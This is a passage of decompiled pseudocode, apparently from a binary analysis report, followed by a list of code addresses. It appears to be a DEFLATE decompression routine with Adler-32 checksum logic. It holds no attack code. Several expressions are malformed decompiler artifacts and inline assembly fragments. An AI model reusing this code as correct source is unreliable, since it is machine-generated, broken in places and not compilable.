				 *(_t1153 + 0x30) = _t1004;
				 *(_t1153 + 0x38) = _t614 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t709;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1140 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1066 = _t1004 >> 8;
				 *(_t1153 + 0x30) = _t1066;
				 *(_t1153 + 0x38) = ( *(_t1185 + 0x14) << 8) + 0xfffffff8;
				_t675 =  *(_t1185 + 0x14) << 8;
				_t620 = _t552 & 0x000000ff | _t675;
				 *(_t1185 + 0x14) = _t620;
				 *(_t1153 + 0x40) = _t454 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t709;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t457 = _t620 & 0x000000ff;
				if (_t457 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t761 =  !_t759 & _t675;
				_t1067 = _t1066 >> _t457;
				 *(_t1153 + 0x30) = _t1067;
				 *(_t1153 + 0x38) = _t552;
				 *(_t1153 + 0x40) =  *(_t1153 + 0x40) + _t761;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1153 + 0x30) = _t1067 >> _t457;
				 *(_t1153 + 0x38) = _t552;
				 *(_t1153 + 0x3c) =  *(_t1153 + 0x3c) + ( !_t761 & _t675);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1153 + 0x30) = _t1004 >> _t457;
				 *(_t1153 + 0x38) = _t709;
				 *(_t1153 + 0x80) = _t942;
				 *(_t1153 + 0x88) = _t942;
				 *((long long*)(_t1153 + 0x90)) = 0xb;
				_t624 =  *(_t1153 + 0x3c);
				_t943 = _t942 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t624 != 0x10) goto 0xf30606d9;
				if (_t1118 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1153 + 0x30) = _t943 >> 8;
				 *(_t1153 + 0x38) = _t624 + 0xfffffff8;
				 *(_t1153 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t460 =  *(_t1185 + 0x291d) & 0x0000ffff;
				 *(_t1153 + 0x40) = _t460;
				r12b = 0x1e;
				if (_t460 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t460 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1030 =  *((intOrPtr*)(_t1153 + 0x128));
				E000007FE7FEF30F24C0();
				_t1186 =  *((intOrPtr*)(_t1153 + 0x58));
				 *(_t1153 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t943 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1153 + 0x6c);
				if (_t1030 - 1 > 0) goto 0xf3060acc;
				_t628 =  *(_t1153 + 0x38);
				_t465 =  *((short*)(_t1186 + 0x3c + _t943 * 2));
				if (_t465 < 0) goto 0xf3060659;
				if ((_t465 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t466 = _t465 >> 9;
				if (_t628 - _t466 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t628 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t466 - 0x23f > 0) goto 0xf3061218;
				_t468 =  *((short*)(_t1186 + 0x83c + _t943 * 2));
				if (_t468 >= 0) goto 0xf3060690;
				if (_t628 - 0xc >= 0) goto 0xf3060663;
				if (_t468 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1226 = __r15 + 1;
				 *(_t1153 + 0x30) =  *(_t1153 + 0x30) | _t943 << _t628;
				 *(_t1153 + 0x38) = _t1030 + 8;
				_t872 = _t628 - 6;
				if (_t872 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1103 =  *((intOrPtr*)(_t1153 + 0x80 + _t943 * 8)) + (_t1004 & 0xffffffff);
				if (_t872 < 0) goto 0xf30613e0;
				if (_t1103 + _t1118 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1103 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1153 + 0x40) =  *(_t1153 + 0x40) + _t709;
				r12b = 0xa;
				_t1187 =  *((intOrPtr*)(_t1153 + 0x58));
				_t1195 =  *((intOrPtr*)(_t1153 + 0x1a0));
				_t1165 =  *((intOrPtr*)(_t1153 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t731 =  *(_t1153 + 0x38);
				 *(_t1153 + 0x68) =  *(_t1153 + 0x3c);
				r9d =  *(_t1153 + 0x44);
				_t949 = __r15 - _t1226;
				r12b = 0xc;
				if (_t949 - 0xe < 0) goto 0xf3060b66;
				if (_t731 - 0x1d > 0) goto 0xf3060794;
				_t950 = _t949 << _t731;
				_t1227 = _t1226 + 4;
				_t631 =  *((short*)(_t1187 + 0x3c + _t950 * 2));
				if (_t631 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t631 - 0x23f > 0) goto 0xf306126f;
				_t880 =  *((short*)(_t1187 + 0x83c +  &(( *(_t1153 + 0xe8))[_t1118]) * 2));
				if (_t880 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t880 < 0) goto 0xf30608a8;
				_t482 =  *((short*)(_t1187 + 0x3c + _t950 * 2));
				if (_t482 < 0) goto 0xf3060820;
				if ((_t482 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t482 - 0x23f > 0) goto 0xf306127b;
				_t484 =  *((short*)(_t1187 + 0x83c + _t950 * 2));
				if (_t484 < 0) goto 0xf3060825;
				_t485 = _t484 & 0x0000ffff;
				_t885 = _t1165 -  *((intOrPtr*)(_t1153 + 0x1a8));
				if (_t885 >= 0) goto 0xf3061284;
				_t734 = _t731 + 0x20;
				 *(_t1195 + _t1165) = bpl;
				_t1032 = _t1165 + 1;
				asm("bt eax, 0x8");
				if (_t885 < 0) goto 0xf30608a3;
				_t1076 =  *((intOrPtr*)(_t1153 + 0x1a8));
				if (_t1032 - _t1076 >= 0) goto 0xf30612a2;
				 *(_t1195 + _t1165 + 1) = _t485;
				if (_t1076 - _t1165 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1167 = _t1032;
				_t487 = _t485 & 0x000001ff;
				if (_t487 == 0x100) goto 0xf3060b5e;
				if (_t487 - 0x11d > 0) goto 0xf3061298;
				if (_t734 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1227 - 3 <= 0) goto 0xf306140a;
				_t1228 = _t1227 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t495 =  *((short*)(_t1187 + 0xdda));
				if (_t495 < 0) goto 0xf3060955;
				if ((_t495 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t495 - 0x23f > 0) goto 0xf306127b;
				_t497 =  *((short*)(_t1187 + 0x15da));
				if (_t497 < 0) goto 0xf306095a;
				_t737 = _t734 + 0x20 - r9d - 0xb;
				if ((_t497 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1153 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1153 + 0x118)) = _t1179;
				if (r9d == 0) goto 0xf3060a01;
				if (_t737 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1228 - 3 <= 0) goto 0xf306140a;
				_t1112 = ((( *(_t1153 + 0x30) | _t950) >> 0x0000000a >> 0xb | __r15 - _t1227 << _t734) >> r9d >> 0xb | 0xffffffff << r9d << _t737) >> r9d;
				_t739 = _t737 + 0x20 - r9d;
				 *(_t1153 + 0x68) = ( !( *_t1228) & _t709) +  *(_t1153 + 0x68);
				r9d =  *(_t1153 + 0x68);
				if (_t1167 - _t1179 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1153 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t1153 + 0x70)) = _t1206;
				 *((long long*)(_t1153 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1153 + 0x28)) =  *(_t1153 + 0xb8);
				 *((long long*)(_t1153 + 0x20)) = 0xf311ef68;
				_t1035 = _t1195;
				_t1081 =  *((intOrPtr*)(_t1153 + 0x1a8));
				E000007FE7FEF306148C(_t1035, _t1081, _t1167, _t1179);
				if ( *((intOrPtr*)(_t1153 + 0x1a8)) - _t1167 +  *((intOrPtr*)(_t1153 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1153 + 0x40) = _t739;
				goto 0xf305f43b;
				_t966 =  *(_t1153 + 0xb8);
				 *((long long*)(_t1153 + 0x28)) = _t966;
				 *((long long*)(_t1153 + 0x20)) = _t1035;
				_t1036 =  *((intOrPtr*)(_t1153 + 0x1a0));
				_t506 = E000007FE7FEF306148C(_t1036, _t1081, _t1035,  *((intOrPtr*)(_t1153 + 0x118)));
				_t1189 =  *((intOrPtr*)(_t1153 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t650 = _t506;
				_t1083 = _t1081 << _t650 |  *(_t1153 + 0x30);
				 *(_t1153 + 0x30) = _t1083;
				 *(_t1153 + 0x38) = _t506 + 0x10;
				goto 0xf3060aee;
				_t710 =  *((short*)(_t1189 + 0x3c + _t1036 * 2));
				if (_t710 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t710 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t713 =  *((short*)(_t1189 + 0x83c + _t1112 * 2));
				if (_t713 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1153 + 0x30) = _t1083 >> 0xb;
				 *(_t1153 + 0x38) = _t650 - 0xb;
				 *(_t1153 + 0x40) = _t713 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1153 + 0x30) = _t1112;
				 *(_t1153 + 0x38) = _t739;
				 *(_t1153 + 0x3c) =  *(_t1153 + 0x68);
				 *(_t1153 + 0x40) = 0x100;
				 *(_t1153 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1036 + 8)) = 0xfd;
				 *_t1036 = _t966;
				 *((long long*)(_t1036 + 0x10)) = _t966;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1190 =  *((intOrPtr*)(_t1153 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t512 = r9b & 0xffffffff;
				if (_t512 == 0xfc) goto 0xf3060cbe;
				_t657 =  *(_t1153 + 0x38);
				_t717 =  >=  ? _t512 - r15d + r14d : _t657 >> 3;
				_t515 = _t1112 * 8;
				 *(_t1153 + 0x38) = _t657 - _t515;
				_t1121 =  &(_t1228[1]);
				_t1151 =  *((intOrPtr*)(_t1153 + 0x1b0));
				goto 0xf3060cc0;
				_t1037 =  *((intOrPtr*)(_t1153 + 0x1a8));
				if ( *((intOrPtr*)(_t1153 + 0x70)) != _t1037) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t515 & 0xffffff00 | r12b == 0x00000017);
				_t1174 = _t1037;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1190 + 0x291c) = r12b;
				_t659 =  *(_t1153 + 0x38);
				 *(_t1190 + 8) = _t659;
				 *(_t1190 + 0x24) =  *(_t1153 + 0x3c);
				 *(_t1190 + 0x28) =  *(_t1153 + 0x40);
				 *(_t1190 + 0x2c) =  *(_t1153 + 0x44);
				 *_t1190 =  !(0xffffffff << _t659) &  *(_t1153 + 0x30);
				_t913 =  *(_t1153 + 0x1b8) & 0x00000040;
				if (_t913 != 0) goto 0xf3061169;
				if (_t913 == 0) goto 0xf3061169;
				_t914 = r9b;
				if (_t914 < 0) goto 0xf3061169;
				_t1008 = _t1174 - _t1151;
				if (_t914 < 0) goto 0xf306137a;
				 *(_t1153 + 0xb8) = _t1112;
				 *(_t1153 + 0x6c) = r9d;
				if (_t1174 -  *((intOrPtr*)(_t1153 + 0x1a8)) > 0) goto 0xf3061389;
				_t519 =  *(_t1190 + 0x20);
				_t1198 =  *((intOrPtr*)(_t1153 + 0x1a0)) + _t1151;
				_t720 = _t519 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1039 = _t1008 & 0xfffffffc;
				 *(_t1153 + 0xf8) = _t1008;
				 *(_t1153 + 0x108) = _t1008;
				_t975 = _t1039 - 0x3f51f0dfc0;
				 *(_t1153 + 0x50) = _t975;
				r12d = 0x56c0;
				 *(_t1153 + 0xe8) = _t1198;
				 *(_t1153 + 0xd8) = _t1121;
				 *(_t1153 + 0x7c) = _t720;
				 *(_t1153 + 0x100) = _t1039;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t720 * 0x56c0;
				_t1209 = _t1198;
				 *(_t1153 + 0x80) =  *_t1209 & 0x000000ff;
				 *(_t1153 + 0x84) = _t1209[1] & 0x000000ff;
				 *(_t1153 + 0x88) = _t1209[2] & 0x000000ff;
				 *(_t1153 + 0x8c) = _t1209[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1153 + 0xc0 + _t1190 * 4)) =  *((intOrPtr*)(_t1153 + 0xc0 + _t1190 * 4)) +  *((intOrPtr*)(_t1153 + 0x80 + _t1190 * 4));
				_t321 = _t1190 + 1; // 0x1
				if (_t321 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1153 + 0xa0 + _t1121 * 4)) =  *((intOrPtr*)(_t1153 + 0xa0 + _t1121 * 4)) +  *((intOrPtr*)(_t1153 + 0x80 + _t1121 * 4));
				_t331 = _t1121 + 1; // 0x1
				_t918 = _t331 - 4;
				if (_t918 != 0) goto 0xf3060e4c;
				_t976 = _t975 + 0xfffffffc;
				if (_t918 != 0) goto 0xf3060dea;
				_t561 =  *(_t1153 + 0xc0 + _t976 * 4);
				 *(_t1153 + 0xc0 + _t976 * 4) = _t561;
				_t338 = _t976 + 1; // 0x1
				_t1009 = _t338;
				_t977 = _t1009;
				if (_t1009 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1153 + 0xa0 + _t977 * 4)) =  *((intOrPtr*)(_t1153 + 0xa0 + _t977 * 4)) - _t561 * 0xfff1;
				_t345 = _t977 + 1; // 0x1
				if (_t345 != 4) goto 0xf3060ea7;
				_t981 = _t1151 * _t1039 >> 0x2f;
				_t921 = 0x3f51f08900 - __r12;
				if (_t921 >= 0) goto 0xf3060de2;
				_t1234 =  *(_t1153 + 0x108);
				r14d = r14d & 0x00000003;
				_t1177 =  *((intOrPtr*)(_t1153 + 0x58));
				r10d =  *(_t1153 + 0x1b8);
				_t1126 =  *(_t1153 + 0xe8);
				r12d =  *(_t1153 + 0x7c);
				if (_t921 == 0) goto 0xf3060fc8;
				_t1182 = 0x3f51f0dfc0 + _t1126;
				 *(_t1153 + 0x80) =  *_t1182 & 0x000000ff;
				 *(_t1153 + 0x84) = _t1182[1] & 0x000000ff;
				 *(_t1153 + 0x88) = _t1182[2] & 0x000000ff;
				 *(_t1153 + 0x8c) = _t1182[3] & 0x000000ff;
				 *((intOrPtr*)(_t1153 + 0xc0 + _t981 * 4)) =  *((intOrPtr*)(_t1153 + 0xc0 + _t981 * 4)) +  *((intOrPtr*)(_t1153 + 0x80 + _t981 * 4));
				_t369 = _t981 + 1; // 0x1
				_t1090 = _t369;
				_t982 = _t1090;
				if (_t1090 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t688 =  *(_t1153 + 0x80 + _t982 * 4);
				 *((intOrPtr*)(_t1153 + 0xa0 + _t982 * 4)) =  *((intOrPtr*)(_t1153 + 0xa0 + _t982 * 4)) + _t688;
				_t379 = _t982 + 1; // 0x1
				_t1091 = _t379;
				_t983 = _t1091;
				_t923 = _t1091 - 4;
				if (_t923 != 0) goto 0xf3060f9f;
				if (_t923 != 0) goto 0xf3060f41;
				_t689 = _t688 * 0xfff1;
				 *((intOrPtr*)(_t1153 + 0xc0 + _t983 * 4)) =  *((intOrPtr*)(_t1153 + 0xc0 + _t983 * 4)) - _t689;
				_t387 = _t983 + 1; // 0x1
				_t1095 = _t387;
				_t984 = _t1095;
				if (_t1095 != 4) goto 0xf3060fd7;
				r9d =  *(_t1153 + 0x6c);
				 *((intOrPtr*)(_t1153 + 0xa0 + _t984 * 4)) =  *((intOrPtr*)(_t1153 + 0xa0 + _t984 * 4)) - _t689 * 0xfff1;
				_t396 = _t984 + 1; // 0x1
				_t1099 = _t396;
				_t985 = _t1099;
				if (_t1099 != 4) goto 0xf3061019;
				 *(_t1153 + 0xa0 + _t985 * 4) =  *(_t1153 + 0xa0 + _t985 * 4) << 2;
				_t986 = _t985 + 1;
				if (_t986 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1153 + 0xa4)) =  *((intOrPtr*)(_t1153 + 0xa4)) -  *((intOrPtr*)(_t1153 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1153 + 0xa8)) =  ~( *((intOrPtr*)(_t1153 + 0xc8)) +  *((intOrPtr*)(_t1153 + 0xc8))) +  *((intOrPtr*)(_t1153 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1153 + 0xac)) =  *((intOrPtr*)(_t1153 + 0xac)) + _t1099 + _t1099 * 2;
				_t987 = _t986 + 1;
				if (_t987 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1153 + 0x50);
				_t989 = _t987 * _t1151 >> 0x2f;
				_t990 = _t989 + 1;
				if (_t990 != 4) goto 0xf30610e4;
				if (_t1234 == 0) goto 0xf306110b;
				_t669 = r12d +  *((intOrPtr*)(_t1153 + 0xc0 + _t986 * 4)) + ( *(_t1126 +  *(_t1153 + 0x100) + _t990) & 0x000000ff);
				_t785 = (_t519 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1153 + 0xa0 + _t989 * 4)) + _t669;
				if (_t1234 != _t990 + 1) goto 0xf30610fb;
				_t548 = _t785 * 0xfff1;
				_t788 = _t785 - _t548 << 0x00000010 | _t669 - _t669 * 0x0000fff1;
				 *(_t1177 + 0x20) = _t788;
				_t931 = r9b;
				if (_t931 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t931 == 0) goto 0xf306117f;
				r9b = _t788 ==  *((intOrPtr*)(_t1177 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t997 =  *((intOrPtr*)(_t1153 + 0x110));
				 *(_t997 + 8) = r9b;
				 *_t997 =  *((intOrPtr*)(_t1153 + 0xe0)) -  *(_t1153 + 0xb8) + __r15 +  *(_t1153 + 0xd8);
				 *((long long*)(_t997 + 0x10)) = _t1177 - _t1151;
				return _t548;
			}

0x7fef305fdca
0x7fef305fdd9
0x7fef305fde2
0x7fef305fde7
0x7fef305fdf0
0x7fef305fdf8
0x7fef305fdfe
0x7fef305fe01
0x7fef305fe0c
0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
